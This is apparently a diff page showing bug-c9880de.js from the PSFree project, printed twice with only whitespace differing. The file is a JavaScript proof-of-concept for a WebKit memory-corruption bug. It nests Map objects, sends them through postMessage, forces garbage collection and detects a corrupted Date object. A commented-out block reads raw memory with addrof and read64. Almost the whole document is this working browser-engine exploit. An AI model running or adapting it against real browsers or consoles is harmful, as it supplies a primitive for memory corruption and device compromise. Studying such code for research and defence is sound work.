ntfargo · May 26, 2025 22:09
diff --git a/bug-c9880de.js b/bug-c9880de.js
 /* Copyright (C) 2024 anonymous

 This file is part of PSFree.

 PSFree is free software: you can redistribute it and/or modify
 it under the terms of the GNU Affero General Public License as
 published by the Free Software Foundation, either version 3 of the
 License, or (at your option) any later version.

 PSFree is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU Affero General Public License for more details.

 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */

 // see commit c9880de4a28b at WebKit@main (git)

 //import { mem } from '/module/mem.mjs';
 import { debug_log } from '/module/utils.mjs';

 export function sleep(ms=0) {
    return new Promise(resolve => setTimeout(resolve, ms));
 }

 function gc() {
    new Uint8Array(4 * 1024 * 1024);
 }

 function spray() {
    const tmp = [];
    for (let j = 0; j < 1024; j++) {
        const d = new Date(0xbeef);
        tmp.push(d);
    }
 }

 void async function main() {
    const num_elems = 1600; // increased from 800
    let root = new Map();
    let msg = root;
    let foo = [];
    for (let i = 0; i < 100; i++) {
        foo.push(new Date(0xffff));
    }
    for (let i = 0; i < num_elems; i++) {
        const d = new Date(i);
        const map = new Map();
        msg.set(d, [map, foo]);
        msg = map;
    }
    msg = root;

    let data2 = null;
    let idx = null;
    loop: while (true) {
        let data = null;
        const prom = new Promise(resolve => {
            addEventListener('message', event => {
                data = event;
                resolve();
            }, {once: true});
        });
        postMessage(msg, origin);
        await prom;
        data = data.data;

        gc();
        await sleep();

        let tmp_i = null;
        try {
            for (let i = 0; i < num_elems; i++) {
                tmp_i = i;
                if (data.keys().next().value.getTime() === 0xffff) {
                    idx = i;
                    break loop;
                }
                data = data.values().next().value[0];
            }
        } catch {
            idx = tmp_i;
            data2 = data.keys().next().value;
            break loop;
        }
    }

    // comment this out if you just want to crash
    // import mem if you want to read the corrupted object
    /*
    debug_log('normal Date:');
    const tmp_d = new Date();
    const date_p = mem.addrof(tmp_d);
    for (let i = 0; i < 8*8; i += 8) {
        debug_log(date_p.read64(i));
    }
    debug_log('corrupted:');
    const data_p = mem.addrof(data2);
    for (let i = 0; i < 8*8; i += 8) {
        debug_log(data_p.read64(i));
    }
    */

    alert('try crash');
    debug_log(data2);
 }();
	/* Copyright (C) 2024 anonymous

	This file is part of PSFree.

	PSFree is free software: you can redistribute it and/or modify
	it under the terms of the GNU Affero General Public License as
	published by the Free Software Foundation, either version 3 of the
	License, or (at your option) any later version.

	PSFree is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	GNU Affero General Public License for more details.

	You should have received a copy of the GNU Affero General Public License
	along with this program. If not, see <https://www.gnu.org/licenses/>. */

	// see commit c9880de4a28b at WebKit@main (git)

	//import { mem } from '/module/mem.mjs';
	import { debug_log } from '/module/utils.mjs';

	export function sleep(ms=0) {
	return new Promise(resolve => setTimeout(resolve, ms));
	}

	function gc() {
	new Uint8Array(4 * 1024 * 1024);
	}

	function spray() {
	const tmp = [];
	for (let j = 0; j < 1024; j++) {
	const d = new Date(0xbeef);
	tmp.push(d);
	}
	}

	void async function main() {
	const num_elems = 1600; // increased from 800
	let root = new Map();
	let msg = root;
	let foo = [];
	for (let i = 0; i < 100; i++) {
	foo.push(new Date(0xffff));
	}
	for (let i = 0; i < num_elems; i++) {
	const d = new Date(i);
	const map = new Map();
	msg.set(d, [map, foo]);
	msg = map;
	}
	msg = root;

	let data2 = null;
	let idx = null;
	loop: while (true) {
	let data = null;
	const prom = new Promise(resolve => {
	addEventListener('message', event => {
	data = event;
	resolve();
	}, {once: true});
	});
	postMessage(msg, origin);
	await prom;
	data = data.data;

	gc();
	await sleep();

	let tmp_i = null;
	try {
	for (let i = 0; i < num_elems; i++) {
	tmp_i = i;
	if (data.keys().next().value.getTime() === 0xffff) {
	idx = i;
	break loop;
	}
	data = data.values().next().value[0];
	}
	} catch {
	idx = tmp_i;
	data2 = data.keys().next().value;
	break loop;
	}
	}

	// comment this out if you just want to crash
	// import mem if you want to read the corrupted object
	/*
	debug_log('normal Date:');
	const tmp_d = new Date();
	const date_p = mem.addrof(tmp_d);
	for (let i = 0; i < 8*8; i += 8) {
	debug_log(date_p.read64(i));
	}
	debug_log('corrupted:');
	const data_p = mem.addrof(data2);
	for (let i = 0; i < 8*8; i += 8) {
	debug_log(data_p.read64(i));
	}
	*/

	alert('try crash');
	debug_log(data2);
	}();